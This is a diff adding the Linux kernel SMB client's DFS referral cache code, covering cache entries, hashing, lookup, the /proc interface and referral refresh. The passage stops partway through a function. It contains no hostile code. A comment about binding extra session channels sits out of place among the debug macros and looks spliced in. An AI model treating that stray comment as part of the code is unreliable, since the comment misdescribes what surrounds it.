+diff --git a/fs/smb/client/dfs_cache.c b/fs/smb/client/dfs_cache.c
+new file mode 100644
+index 0000000000000..3bc1d3494be3a
+--- /dev/null
++++ b/fs/smb/client/dfs_cache.c
+@@ -0,0 +1,1690 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * DFS referral cache routines
++ *
++ * Copyright (c) 2018-2019 Paulo Alcantara <palcantara@suse.de>
++ */
++
++#include <linux/jhash.h>
++#include <linux/ktime.h>
++#include <linux/slab.h>
++#include <linux/proc_fs.h>
++#include <linux/nls.h>
++#include <linux/workqueue.h>
++#include <linux/uuid.h>
++#include "cifsglob.h"
++#include "smb2pdu.h"
++#include "smb2proto.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_unicode.h"
++#include "smb2glob.h"
++#include "dns_resolve.h"
++
++#include "dfs_cache.h"
++
++#define CACHE_HTABLE_SIZE 32
++#define CACHE_MAX_ENTRIES 64
++#define CACHE_MIN_TTL 120 /* 2 minutes */
++
++#define IS_DFS_INTERLINK(v) (((v) & DFSREF_REFERRAL_SERVER) && !((v) & DFSREF_STORAGE_SERVER))
++
++struct cache_dfs_tgt {
++	char *name;
++	int path_consumed;
++	struct list_head list;
++};
++
++struct cache_entry {
++	struct hlist_node hlist;
++	const char *path;
++	int hdr_flags; /* RESP_GET_DFS_REFERRAL.ReferralHeaderFlags */
++	int ttl; /* DFS_REREFERRAL_V3.TimeToLive */
++	int srvtype; /* DFS_REREFERRAL_V3.ServerType */
++	int ref_flags; /* DFS_REREFERRAL_V3.ReferralEntryFlags */
++	struct timespec64 etime;
++	int path_consumed; /* RESP_GET_DFS_REFERRAL.PathConsumed */
++	int numtgts;
++	struct list_head tlist;
++	struct cache_dfs_tgt *tgthint;
++};
++
++/* List of referral server sessions per dfs mount */
++struct mount_group {
++	struct list_head list;
++	uuid_t id;
++	struct cifs_ses *sessions[CACHE_MAX_ENTRIES];
++	int num_sessions;
++	spinlock_t lock;
++	struct list_head refresh_list;
++	struct kref refcount;
++};
++
++static struct kmem_cache *cache_slab __read_mostly;
++static struct workqueue_struct *dfscache_wq __read_mostly;
++
++static int cache_ttl;
++static DEFINE_SPINLOCK(cache_ttl_lock);
++
++static struct nls_table *cache_cp;
++
++/*
++ * Number of entries in the cache
++ */
++static atomic_t cache_count;
++
++static struct hlist_head cache_htable[CACHE_HTABLE_SIZE];
++static DECLARE_RWSEM(htable_rw_lock);
++
++static LIST_HEAD(mount_group_list);
++static DEFINE_MUTEX(mount_group_list_lock);
++
++static void refresh_cache_worker(struct work_struct *work);
++
++static DECLARE_DELAYED_WORK(refresh_task, refresh_cache_worker);
++
++static void get_ipc_unc(const char *ref_path, char *ipc, size_t ipclen)
++{
++	const char *host;
++	size_t len;
++
++	extract_unc_hostname(ref_path, &host, &len);
++	scnprintf(ipc, ipclen, "\\\\%.*s\\IPC$", (int)len, host);
++}
++
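++/*
++ * Walk a NULL-terminated array of sessions and return the one whose IPC tcon
++ * is connected to the \\server\IPC$ share derived from @path.
++ */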
++static struct cifs_ses *find_ipc_from_server_path(struct cifs_ses **ses, const char *path)
++{
++	char unc[SERVER_NAME_LENGTH + sizeof("//x/IPC$")] = {0};
++
++	get_ipc_unc(path, unc, sizeof(unc));
++	for (; *ses; ses++) {
++		if (!strcasecmp(unc, (*ses)->tcon_ipc->tree_name))
++			return *ses;
++	}
++	return ERR_PTR(-ENOENT);
++}
++
++static void __mount_group_release(struct mount_group *mg)
++{
++	int i;
++
++	for (i = 0; i < mg->num_sessions; i++)
++		cifs_put_smb_ses(mg->sessions[i]);
++	kfree(mg);
++}
++
++static void mount_group_release(struct kref *kref)
++{
++	struct mount_group *mg = container_of(kref, struct mount_group, refcount);
++
++	mutex_lock(&mount_group_list_lock);
++	list_del(&mg->list);
++	mutex_unlock(&mount_group_list_lock);
++	__mount_group_release(mg);
++}
++
++static struct mount_group *find_mount_group_locked(const uuid_t *id)
++{
++	struct mount_group *mg;
++
++	list_for_each_entry(mg, &mount_group_list, list) {
++		if (uuid_equal(&mg->id, id))
++			return mg;
++	}
++	return ERR_PTR(-ENOENT);
++}
++
++static struct mount_group *__get_mount_group_locked(const uuid_t *id)
++{
++	struct mount_group *mg;
++
++	mg = find_mount_group_locked(id);
++	if (!IS_ERR(mg))
++		return mg;
++
++	mg = kmalloc(sizeof(*mg), GFP_KERNEL);
++	if (!mg)
++		return ERR_PTR(-ENOMEM);
++	kref_init(&mg->refcount);
++	uuid_copy(&mg->id, id);
++	mg->num_sessions = 0;
++	spin_lock_init(&mg->lock);
++	list_add(&mg->list, &mount_group_list);
++	return mg;
++}
++
++static struct mount_group *get_mount_group(const uuid_t *id)
++{
++	struct mount_group *mg;
++
++	mutex_lock(&mount_group_list_lock);
++	mg = __get_mount_group_locked(id);
++	if (!IS_ERR(mg))
++		kref_get(&mg->refcount);
++	mutex_unlock(&mount_group_list_lock);
++
++	return mg;
++}
++
++static void free_mount_group_list(void)
++{
++	struct mount_group *mg, *tmp_mg;
++
++	list_for_each_entry_safe(mg, tmp_mg, &mount_group_list, list) {
++		list_del_init(&mg->list);
++		__mount_group_release(mg);
++	}
++}
++
++/**
++ * dfs_cache_canonical_path - get a canonical DFS path
++ *
++ * @path: DFS path
++ * @cp: codepage
++ * @remap: mapping type
++ *
++ * Return the canonical path on success, otherwise an ERR_PTR.
++ */
++char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap)
++{
++	char *tmp;
++	int plen = 0;
++	char *npath;
++
++	if (!path || strlen(path) < 3 || (*path != '\\' && *path != '/'))
++		return ERR_PTR(-EINVAL);
++
++	if (unlikely(strcmp(cp->charset, cache_cp->charset))) {
++		tmp = (char *)cifs_strndup_to_utf16(path, strlen(path), &plen, cp, remap);
++		if (!tmp) {
++			cifs_dbg(VFS, "%s: failed to convert path to utf16\n", __func__);
++			return ERR_PTR(-EINVAL);
++		}
++
++		npath = cifs_strndup_from_utf16(tmp, plen, true, cache_cp);
++		kfree(tmp);
++
++		if (!npath) {
++			cifs_dbg(VFS, "%s: failed to convert path from utf16\n", __func__);
++			return ERR_PTR(-EINVAL);
++		}
++	} else {
++		npath = kstrdup(path, GFP_KERNEL);
++		if (!npath)
++			return ERR_PTR(-ENOMEM);
++	}
++	convert_delimiter(npath, '\\');
++	return npath;
++}
++
++static inline bool cache_entry_expired(const struct cache_entry *ce)
++{
++	struct timespec64 ts;
++
++	ktime_get_coarse_real_ts64(&ts);
++	return timespec64_compare(&ts, &ce->etime) >= 0;
++}
++
++static inline void free_tgts(struct cache_entry *ce)
++{
++	struct cache_dfs_tgt *t, *n;
++
++	list_for_each_entry_safe(t, n, &ce->tlist, list) {
++		list_del(&t->list);
++		kfree(t->name);
++		kfree(t);
++	}
++}
++
++static inline void flush_cache_ent(struct cache_entry *ce)
++{
++	hlist_del_init(&ce->hlist);
++	kfree(ce->path);
++	free_tgts(ce);
++	atomic_dec(&cache_count);
++	kmem_cache_free(cache_slab, ce);
++}
++
++static void flush_cache_ents(void)
++{
++	int i;
++
++	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
++		struct hlist_head *l = &cache_htable[i];
++		struct hlist_node *n;
++		struct cache_entry *ce;
++
++		hlist_for_each_entry_safe(ce, n, l, hlist) {
++			if (!hlist_unhashed(&ce->hlist))
++				flush_cache_ent(ce);
++		}
++	}
++}
++
++/*
++ * dfs cache /proc file
++ */
++static int dfscache_proc_show(struct seq_file *m, void *v)
++{
++	int i;
++	struct cache_entry *ce;
++	struct cache_dfs_tgt *t;
++
++	seq_puts(m, "DFS cache\n---------\n");
++
++	down_read(&htable_rw_lock);
++	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
++		struct hlist_head *l = &cache_htable[i];
++
++		hlist_for_each_entry(ce, l, hlist) {
++			if (hlist_unhashed(&ce->hlist))
++				continue;
++
++			seq_printf(m,
++				   "cache entry: path=%s,type=%s,ttl=%d,etime=%ld,hdr_flags=0x%x,ref_flags=0x%x,interlink=%s,path_consumed=%d,expired=%s\n",
++				   ce->path, ce->srvtype == DFS_TYPE_ROOT ? "root" : "link",
++				   ce->ttl, ce->etime.tv_nsec, ce->hdr_flags, ce->ref_flags,
++				   IS_DFS_INTERLINK(ce->hdr_flags) ? "yes" : "no",
++				   ce->path_consumed, cache_entry_expired(ce) ? "yes" : "no");
++
++			list_for_each_entry(t, &ce->tlist, list) {
++				seq_printf(m, "  %s%s\n",
++					   t->name,
++					   ce->tgthint == t ? " (target hint)" : "");
++			}
++		}
++	}
++	up_read(&htable_rw_lock);
++
++	return 0;
++}
++
++static ssize_t dfscache_proc_write(struct file *file, const char __user *buffer,
++				   size_t count, loff_t *ppos)
++{
++	char c;
++	int rc;
++
++	rc = get_user(c, buffer);
++	if (rc)
++		return rc;
++
++	if (c != '0')
++		return -EINVAL;
++
++	cifs_dbg(FYI, "clearing dfs cache\n");
++
++	down_write(&htable_rw_lock);
++	flush_cache_ents();
++	up_write(&htable_rw_lock);
++
++	return count;
++}
++
++static int dfscache_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, dfscache_proc_show, NULL);
++}
++
++const struct proc_ops dfscache_proc_ops = {
++	.proc_open	= dfscache_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= dfscache_proc_write,
++};
++
++#ifdef CONFIG_CIFS_DEBUG2
++static inline void dump_tgts(const struct cache_entry *ce)
++{
++	struct cache_dfs_tgt *t;
++
++	cifs_dbg(FYI, "target list:\n");
++	list_for_each_entry(t, &ce->tlist, list) {
++		cifs_dbg(FYI, "  %s%s\n", t->name,
++			 ce->tgthint == t ? " (target hint)" : "");
++	}
++}
++
++static inline void dump_ce(const struct cache_entry *ce)
++{
++	cifs_dbg(FYI, "cache entry: path=%s,type=%s,ttl=%d,etime=%ld,hdr_flags=0x%x,ref_flags=0x%x,interlink=%s,path_consumed=%d,expired=%s\n",
++		 ce->path,
++		 ce->srvtype == DFS_TYPE_ROOT ? "root" : "link", ce->ttl,
++		 ce->etime.tv_nsec,
++		 ce->hdr_flags, ce->ref_flags,
++		 IS_DFS_INTERLINK(ce->hdr_flags) ? "yes" : "no",
++		 ce->path_consumed,
++		 cache_entry_expired(ce) ? "yes" : "no");
++	dump_tgts(ce);
++}
++
++static inline void dump_refs(const struct dfs_info3_param *refs, int numrefs)
++{
++	int i;
++
++	cifs_dbg(FYI, "DFS referrals returned by the server:\n");
++	for (i = 0; i < numrefs; i++) {
++		const struct dfs_info3_param *ref = &refs[i];
++
++		cifs_dbg(FYI,
++			 "\n"
++			 "flags:         0x%x\n"
++			 "path_consumed: %d\n"
++			 "server_type:   0x%x\n"
++			 "ref_flag:      0x%x\n"
++			 "path_name:     %s\n"
++			 "node_name:     %s\n"
++			 "ttl:           %d (%dm)\n",
++			 ref->flags, ref->path_consumed, ref->server_type,
++			 ref->ref_flag, ref->path_name, ref->node_name,
++			 ref->ttl, ref->ttl / 60);
++	}
++}
++#else
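++	/*
++	 * If at least one channel is still good, this setup only binds an
++	 * additional channel to the existing session rather than establishing
++	 * a brand new one.
++	 */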
++#define dump_tgts(e)
++#define dump_ce(e)
++#define dump_refs(r, n)
++#endif
++
++/**
++ * dfs_cache_init - Initialize DFS referral cache.
++ *
++ * Return zero if initialized successfully, otherwise non-zero.
++ */
++int dfs_cache_init(void)
++{
++	int rc;
++	int i;
++
++	dfscache_wq = alloc_workqueue("cifs-dfscache", WQ_FREEZABLE | WQ_UNBOUND, 1);
++	if (!dfscache_wq)
++		return -ENOMEM;
++
++	cache_slab = kmem_cache_create("cifs_dfs_cache",
++				       sizeof(struct cache_entry), 0,
++				       SLAB_HWCACHE_ALIGN, NULL);
++	if (!cache_slab) {
++		rc = -ENOMEM;
++		goto out_destroy_wq;
++	}
++
++	for (i = 0; i < CACHE_HTABLE_SIZE; i++)
++		INIT_HLIST_HEAD(&cache_htable[i]);
++
++	atomic_set(&cache_count, 0);
++	cache_cp = load_nls("utf8");
++	if (!cache_cp)
++		cache_cp = load_nls_default();
++
++	cifs_dbg(FYI, "%s: initialized DFS referral cache\n", __func__);
++	return 0;
++
++out_destroy_wq:
++	destroy_workqueue(dfscache_wq);
++	return rc;
++}
++
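++/*
++ * Case-insensitive hash of a DFS path: fold each character to upper case in
++ * the cache codepage before feeding it into jhash, so that lookups ignore
++ * case.
++ */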
++static int cache_entry_hash(const void *data, int size, unsigned int *hash)
++{
++	int i, clen;
++	const unsigned char *s = data;
++	wchar_t c;
++	unsigned int h = 0;
++
++	for (i = 0; i < size; i += clen) {
++		clen = cache_cp->char2uni(&s[i], size - i, &c);
++		if (unlikely(clen < 0)) {
++			cifs_dbg(VFS, "%s: can't convert char\n", __func__);
++			return clen;
++		}
++		c = cifs_toupper(c);
++		h = jhash(&c, sizeof(c), h);
++	}
++	*hash = h % CACHE_HTABLE_SIZE;
++	return 0;
++}
++
++/* Return target hint of a DFS cache entry */
++static inline char *get_tgt_name(const struct cache_entry *ce)
++{
++	struct cache_dfs_tgt *t = ce->tgthint;
++
++	return t ? t->name : ERR_PTR(-ENOENT);
++}
++
++/* Return expire time out of a new entry's TTL */
++static inline struct timespec64 get_expire_time(int ttl)
++{
++	struct timespec64 ts = {
++		.tv_sec = ttl,
++		.tv_nsec = 0,
++	};
++	struct timespec64 now;
++
++	ktime_get_coarse_real_ts64(&now);
++	return timespec64_add(now, ts);
++}
++
++/* Allocate a new DFS target */
++static struct cache_dfs_tgt *alloc_target(const char *name, int path_consumed)
++{
++	struct cache_dfs_tgt *t;
++
++	t = kmalloc(sizeof(*t), GFP_ATOMIC);
++	if (!t)
++		return ERR_PTR(-ENOMEM);
++	t->name = kstrdup(name, GFP_ATOMIC);
++	if (!t->name) {
++		kfree(t);
++		return ERR_PTR(-ENOMEM);
++	}
++	t->path_consumed = path_consumed;
++	INIT_LIST_HEAD(&t->list);
++	return t;
++}
++
++/*
++ * Copy DFS referral information to a cache entry and conditionally update
++ * target hint.
++ */
++static int copy_ref_data(const struct dfs_info3_param *refs, int numrefs,
++			 struct cache_entry *ce, const char *tgthint)
++{
++	int i;
++
++	ce->ttl = max_t(int, refs[0].ttl, CACHE_MIN_TTL);
++	ce->etime = get_expire_time(ce->ttl);
++	ce->srvtype = refs[0].server_type;
++	ce->hdr_flags = refs[0].flags;
++	ce->ref_flags = refs[0].ref_flag;
++	ce->path_consumed = refs[0].path_consumed;
++
++	for (i = 0; i < numrefs; i++) {
++		struct cache_dfs_tgt *t;
++
++		t = alloc_target(refs[i].node_name, refs[i].path_consumed);
++		if (IS_ERR(t)) {
++			free_tgts(ce);
++			return PTR_ERR(t);
++		}
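++		/*
++		 * Keep the previous target hint at the head of the list so it
++		 * is picked as the new hint below; all other targets go to
++		 * the tail.
++		 */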
++		if (tgthint && !strcasecmp(t->name, tgthint)) {
++			list_add(&t->list, &ce->tlist);
++			tgthint = NULL;
++		} else {
++			list_add_tail(&t->list, &ce->tlist);
++		}
++		ce->numtgts++;
++	}
++
++	ce->tgthint = list_first_entry_or_null(&ce->tlist,
++					       struct cache_dfs_tgt, list);
++
++	return 0;
++}
++
++/* Allocate a new cache entry */
++static struct cache_entry *alloc_cache_entry(struct dfs_info3_param *refs, int numrefs)
++{
++	struct cache_entry *ce;
++	int rc;
++
++	ce = kmem_cache_zalloc(cache_slab, GFP_KERNEL);
++	if (!ce)
++		return ERR_PTR(-ENOMEM);
++
++	ce->path = refs[0].path_name;
++	refs[0].path_name = NULL;
++
++	INIT_HLIST_NODE(&ce->hlist);
++	INIT_LIST_HEAD(&ce->tlist);
++
++	rc = copy_ref_data(refs, numrefs, ce, NULL);
++	if (rc) {
++		kfree(ce->path);
++		kmem_cache_free(cache_slab, ce);
++		ce = ERR_PTR(rc);
++	}
++	return ce;
++}
++
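++/*
++ * Evict the entry with the earliest expiry time.  Caller must hold
++ * htable_rw_lock.
++ */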
++static void remove_oldest_entry_locked(void)
++{
++	int i;
++	struct cache_entry *ce;
++	struct cache_entry *to_del = NULL;
++
++	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
++
++	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
++		struct hlist_head *l = &cache_htable[i];
++
++		hlist_for_each_entry(ce, l, hlist) {
++			if (hlist_unhashed(&ce->hlist))
++				continue;
++			if (!to_del || timespec64_compare(&ce->etime,
++							  &to_del->etime) < 0)
++				to_del = ce;
++		}
++	}
++
++	if (!to_del) {
++		cifs_dbg(FYI, "%s: no entry to remove\n", __func__);
++		return;
++	}
++
++	cifs_dbg(FYI, "%s: removing entry\n", __func__);
++	dump_ce(to_del);
++	flush_cache_ent(to_del);
++}
++
++/* Add a new DFS cache entry */
++static int add_cache_entry_locked(struct dfs_info3_param *refs, int numrefs)
++{
++	int rc;
++	struct cache_entry *ce;
++	unsigned int hash;
++
++	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
++
++	if (atomic_read(&cache_count) >= CACHE_MAX_ENTRIES) {
++		cifs_dbg(FYI, "%s: reached max cache size (%d)\n", __func__, CACHE_MAX_ENTRIES);
++		remove_oldest_entry_locked();
++	}
++
++	rc = cache_entry_hash(refs[0].path_name, strlen(refs[0].path_name), &hash);
++	if (rc)
++		return rc;
++
++	ce = alloc_cache_entry(refs, numrefs);
++	if (IS_ERR(ce))
++		return PTR_ERR(ce);
++
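++	/*
++	 * Track the smallest TTL seen and (re)arm the delayed refresh worker
++	 * so it fires when the soonest entry is due to expire.
++	 */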
++	spin_lock(&cache_ttl_lock);
++	if (!cache_ttl) {
++		cache_ttl = ce->ttl;
++		queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
++	} else {
++		cache_ttl = min_t(int, cache_ttl, ce->ttl);
++		mod_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
++	}
++	spin_unlock(&cache_ttl_lock);
++
++	hlist_add_head(&ce->hlist, &cache_htable[hash]);
++	dump_ce(ce);
++
++	atomic_inc(&cache_count);
++
++	return 0;
++}
++
++/* Check if two DFS paths are equal.  @s1 and @s2 are expected to be in @cache_cp's charset */
++static bool dfs_path_equal(const char *s1, int len1, const char *s2, int len2)
++{
++	int i, l1, l2;
++	wchar_t c1, c2;
++
++	if (len1 != len2)
++		return false;
++
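++	/*
++	 * Compare one multibyte character at a time; if both conversions
++	 * fail, fall back to comparing the raw bytes and advance one byte.
++	 */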
++	for (i = 0; i < len1; i += l1) {
++		l1 = cache_cp->char2uni(&s1[i], len1 - i, &c1);
++		l2 = cache_cp->char2uni(&s2[i], len2 - i, &c2);
++		if (unlikely(l1 < 0 && l2 < 0)) {
++			if (s1[i] != s2[i])
++				return false;
++			l1 = 1;
++			continue;
++		}
++		if (l1 != l2)
++			return false;
++		if (cifs_toupper(c1) != cifs_toupper(c2))
++			return false;
++	}
++	return true;
++}
++
++static struct cache_entry *__lookup_cache_entry(const char *path, unsigned int hash, int len)
++{
++	struct cache_entry *ce;
++
++	hlist_for_each_entry(ce, &cache_htable[hash], hlist) {
++		if (dfs_path_equal(ce->path, strlen(ce->path), path, len)) {
++			dump_ce(ce);
++			return ce;
++		}
++	}
++	return ERR_PTR(-ENOENT);
++}
++
++/*
++ * Find a DFS cache entry in hash table and optionally check prefix path against normalized @path.
++ *
++ * Use whole path components in the match.  Must be called with htable_rw_lock held.
++ *
++ * Return ERR_PTR(-ENOENT) if the entry is not found.
++ */
++static struct cache_entry *lookup_cache_entry(const char *path)
++{
++	struct cache_entry *ce;
++	int cnt = 0;
++	const char *s = path, *e;
++	char sep = *s;
++	unsigned int hash;
++	int rc;
++
++	while ((s = strchr(s, sep)) && ++cnt < 3)
++		s++;
++
++	if (cnt < 3) {
++		rc = cache_entry_hash(path, strlen(path), &hash);
++		if (rc)
++			return ERR_PTR(rc);
++		return __lookup_cache_entry(path, hash, strlen(path));
++	}
++	/*
++	 * Handle paths that have more than two path components and are a complete prefix of the DFS
++	 * referral request path (@path).
++	 *
++	 * See MS-DFSC 3.2.5.5 "Receiving a Root Referral Request or Link Referral Request".
++	 */
++	e = path + strlen(path) - 1;
++	while (e > s) {
++		int len;
++
++		/* skip separators */
++		while (e > s && *e == sep)
++			e--;
++		if (e == s)
++			break;
++
++		len = e + 1 - path;
++		rc = cache_entry_hash(path, len, &hash);
++		if (rc)
++			return ERR_PTR(rc);
++		ce = __lookup_cache_entry(path, hash, len);
++		if (!IS_ERR(ce))
++			return ce;
++
++		/* backward until separator */
++		while (e > s && *e != sep)
++			e--;
++	}
++	return ERR_PTR(-ENOENT);
++}
++
++/**
++ * dfs_cache_destroy - destroy DFS referral cache
++ */
++void dfs_cache_destroy(void)
++{
++	cancel_delayed_work_sync(&refresh_task);
++	unload_nls(cache_cp);
++	free_mount_group_list();
++	flush_cache_ents();
++	kmem_cache_destroy(cache_slab);
++	destroy_workqueue(dfscache_wq);
++
++	cifs_dbg(FYI, "%s: destroyed DFS referral cache\n", __func__);
++}
++
++/* Update a cache entry with the new referral in @refs */
++static int update_cache_entry_locked(struct cache_entry *ce, const struct dfs_info3_param *refs,
++				     int numrefs)
++{
++	int rc;
++	char *s, *th = NULL;
++
++	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
++
++	if (ce->tgthint) {
++		s = ce->tgthint->name;
++		th = kstrdup(s, GFP_ATOMIC);
++		if (!th)
++			return -ENOMEM;
++	}
++
++	free_tgts(ce);
++	ce->numtgts = 0;
++
++	rc = copy_ref_data(refs, numrefs, ce, th);
++
++	kfree(th);
++
++	return rc;
++}
++
++static int get_dfs_referral(const unsigned int xid, struct cifs_ses *ses, const char *path,
++			    struct dfs_info3_param **refs, int *numrefs)
++{
++	int rc;
++	int i;
++
++	cifs_dbg(FYI, "%s: get a DFS referral for %s\n", __func__, path);
++
++	*refs = NULL;
++	*numrefs = 0;
++
++	if (!ses || !ses->server || !ses->server->ops->get_dfs_refer)
++		return -EOPNOTSUPP;
++	if (unlikely(!cache_cp))
++		return -EINVAL;
++
++	rc =  ses->server->ops->get_dfs_refer(xid, ses, path, refs, numrefs, cache_cp,
++					      NO_MAP_UNI_RSVD);
++	if (!rc) {
++		struct dfs_info3_param *ref = *refs;
++
++		for (i = 0; i < *numrefs; i++)
++			convert_delimiter(ref[i].path_name, '\\');
++	}
++	return rc;
++}
++
++/*
++ * Find, create or update a DFS cache entry.
++ *
++ * If the entry wasn't found, a new one is created.  If it was found but had
++ * expired, the entry is updated accordingly.
++ *
++ * For interlinks, cifs_mount() and expand_dfs_referral() are supposed to
++ * handle them properly.
++ */
++static int cache_refresh_path(const unsigned int xid, struct cifs_ses *ses, const char *path)
++{
++	struct dfs_info3_param *refs = NULL;
++	struct cache_entry *ce;
++	int numrefs = 0;
++	int rc;
++
++	cifs_dbg(FYI, "%s: search path: %s\n", __func__, path);
++
++	down_read(&htable_rw_lock);
++
++	ce = lookup_cache_entry(path);
++	if (!IS_ERR(ce) && !cache_entry_expired(ce)) {
++		up_read(&htable_rw_lock);
++		return 0;
++	}
++	/*
++	 * Unlock shared access as we don't want to hold any locks while getting
++	 * a new referral.  The @ses used for performing the I/O could be
++	 * reconnecting, and reconnection itself acquires @htable_rw_lock to
++	 * look up the dfs cache and fail over if necessary.
++	 */
++	up_read(&htable_rw_lock);
++
++	/*
++	 * Either the entry was not found, or it is expired.
++	 * Request a new DFS referral in order to create or update a cache entry.
++	 */
++	rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
++	if (rc)
++		goto out;
++
++	dump_refs(refs, numrefs);
++
++	down_write(&htable_rw_lock);
++	/* Re-check as another task might have it added or refreshed already */
++	ce = lookup_cache_entry(path);
++	if (!IS_ERR(ce)) {
++		if (cache_entry_expired(ce))
++			rc = update_cache_entry_locked(ce, refs, numrefs);
++	} else {
++		rc = add_cache_entry_locked(refs, numrefs);
++	}
++
++	up_write(&htable_rw_lock);
++out:
++	free_dfs_info_array(refs, numrefs);
++	return rc;
++}
++
++/*
++ * Set up a DFS referral from a given cache entry.
++ *
++ * Must be called with htable_rw_lock held.
++ */
++static int setup_referral(const char *path, struct cache_entry *ce,
++			  struct dfs_info3_param *ref, const char *target)
++{
++	int rc;
++
++	cifs_dbg(FYI, "%s: set up new ref\n", __func__);
++
++	memset(ref, 0, sizeof(*ref));
++
++	ref->path_name = kstrdup(path, GFP_ATOMIC);
++	if (!ref->path_name)
++		return -ENOMEM;
++
++	ref->node_name = kstrdup(target, GFP_ATOMIC);
++	if (!ref->node_name) {
++		rc = -ENOMEM;
++		goto err_free_path;
++	}
++
++	ref->path_consumed = ce->path_consumed;
++	ref->ttl = ce->ttl;
++	ref->server_type = ce->srvtype;
++	ref->ref_flag = ce->ref_flags;
++	ref->flags = ce->hdr_flags;
++
++	return 0;
++
++err_free_path:
++	kfree(ref->path_name);
++	ref->path_name = NULL;
++	return rc;
++}
++
++/* Return target list of a DFS cache entry */
++static int get_targets(struct cache_entry *ce, struct dfs_cache_tgt_list *tl)
++{
++	int rc;
++	struct list_head *head = &tl->tl_list;
++	struct cache_dfs_tgt *t;
++	struct dfs_cache_tgt_iterator *it, *nit;
++
++	memset(tl, 0, sizeof(*tl));
++	INIT_LIST_HEAD(head);
++
++	list_for_each_entry(t, &ce->tlist, list) {
++		it = kzalloc(sizeof(*it), GFP_ATOMIC);
++		if (!it) {
++			rc = -ENOMEM;
++			goto err_free_it;
++		}
++
++		it->it_name = kstrdup(t->name, GFP_ATOMIC);
++		if (!it->it_name) {
++			kfree(it);
++			rc = -ENOMEM;
++			goto err_free_it;
++		}
++		it->it_path_consumed = t->path_consumed;
++
++		if (ce->tgthint == t)
++			list_add(&it->it_list, head);
++		else
++			list_add_tail(&it->it_list, head);
++	}
++
++	tl->tl_numtgts = ce->numtgts;
++
++	return 0;
++
++err_free_it:
++	list_for_each_entry_safe(it, nit, head, it_list) {
++		list_del(&it->it_list);
++		kfree(it->it_name);
++		kfree(it);
++	}
++	return rc;
++}
++
++/**
++ * dfs_cache_find - find a DFS cache entry
++ *
++ * If it doesn't find the cache entry, then it will get a DFS referral
++ * for @path and create a new entry.
++ *
++ * In case the cache entry exists but expired, it will get a DFS referral
++ * for @path and then update the respective cache entry.
++ *
++ * These parameters are passed down to the get_dfs_refer() call if it
++ * needs to be issued:
++ * @xid: syscall xid
++ * @ses: smb session to issue the request on
++ * @cp: codepage
++ * @remap: path character remapping type
++ * @path: path to lookup in DFS referral cache.
++ *
++ * @ref: when non-NULL, store single DFS referral result in it.
++ * @tgt_list: when non-NULL, store complete DFS target list in it.
++ *
++ * Return zero if the target was found, otherwise non-zero.
++ */
++int dfs_cache_find(const unsigned int xid, struct cifs_ses *ses, const struct nls_table *cp,
++		   int remap, const char *path, struct dfs_info3_param *ref,
++		   struct dfs_cache_tgt_list *tgt_list)
++{
++	int rc;
++	const char *npath;
++	struct cache_entry *ce;
++
++	npath = dfs_cache_canonical_path(path, cp, remap);
++	if (IS_ERR(npath))
++		return PTR_ERR(npath);
++
++	rc = cache_refresh_path(xid, ses, npath);
++	if (rc)
++		goto out_free_path;
++
++	down_read(&htable_rw_lock);
++
++	ce = lookup_cache_entry(npath);
++	if (IS_ERR(ce)) {
++		up_read(&htable_rw_lock);
++		rc = PTR_ERR(ce);
++		goto out_free_path;
++	}
++
++	if (ref)
++		rc = setup_referral(path, ce, ref, get_tgt_name(ce));
++	else
++		rc = 0;
++	if (!rc && tgt_list)
++		rc = get_targets(ce, tgt_list);
++
++	up_read(&htable_rw_lock);
++
++out_free_path:
++	kfree(npath);
++	return rc;
++}
++
++/**
++ * dfs_cache_noreq_find - find a DFS cache entry without sending any requests to
++ * the currently connected server.
++ *
++ * NOTE: This function will neither update a cache entry in case it was
++ * expired, nor create a new cache entry if @path hasn't been found. It heavily
++ * relies on an existing cache entry.
++ *
++ * @path: canonical DFS path to lookup in the DFS referral cache.
++ * @ref: when non-NULL, store single DFS referral result in it.
++ * @tgt_list: when non-NULL, store complete DFS target list in it.
++ *
++ * Return 0 if successful.
++ * Return -ENOENT if the entry was not found.
++ * Return non-zero for other errors.
++ */
++int dfs_cache_noreq_find(const char *path, struct dfs_info3_param *ref,
++			 struct dfs_cache_tgt_list *tgt_list)
++{
++	int rc;
++	struct cache_entry *ce;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
++
++	down_read(&htable_rw_lock);
++
++	ce = lookup_cache_entry(path);
++	if (IS_ERR(ce)) {
++		rc = PTR_ERR(ce);
++		goto out_unlock;
++	}
++
++	if (ref)
++		rc = setup_referral(path, ce, ref, get_tgt_name(ce));
++	else
++		rc = 0;
++	if (!rc && tgt_list)
++		rc = get_targets(ce, tgt_list);
++
++out_unlock:
++	up_read(&htable_rw_lock);
++	return rc;
++}
++
++/**
++ * dfs_cache_update_tgthint - update target hint of a DFS cache entry
++ *
++ * If it doesn't find the cache entry, then it will get a DFS referral for @path
++ * and create a new entry.
++ *
++ * In case the cache entry exists but expired, it will get a DFS referral
++ * for @path and then update the respective cache entry.
++ *
++ * @xid: syscall id
++ * @ses: smb session
++ * @cp: codepage
++ * @remap: type of character remapping for paths
++ * @path: path to lookup in DFS referral cache
++ * @it: DFS target iterator
++ *
++ * Return zero if the target hint was updated successfully, otherwise non-zero.
++ */
++int dfs_cache_update_tgthint(const unsigned int xid, struct cifs_ses *ses,
++			     const struct nls_table *cp, int remap, const char *path,
++			     const struct dfs_cache_tgt_iterator *it)
++{
++	struct cache_dfs_tgt *t;
++	struct cache_entry *ce;
++	const char *npath;
++	int rc = 0;
++
++	npath = dfs_cache_canonical_path(path, cp, remap);
++	if (IS_ERR(npath))
++		return PTR_ERR(npath);
++
++	cifs_dbg(FYI, "%s: update target hint - path: %s\n", __func__, npath);
++
++	rc = cache_refresh_path(xid, ses, npath);
++	if (rc)
++		goto out_free_path;
++
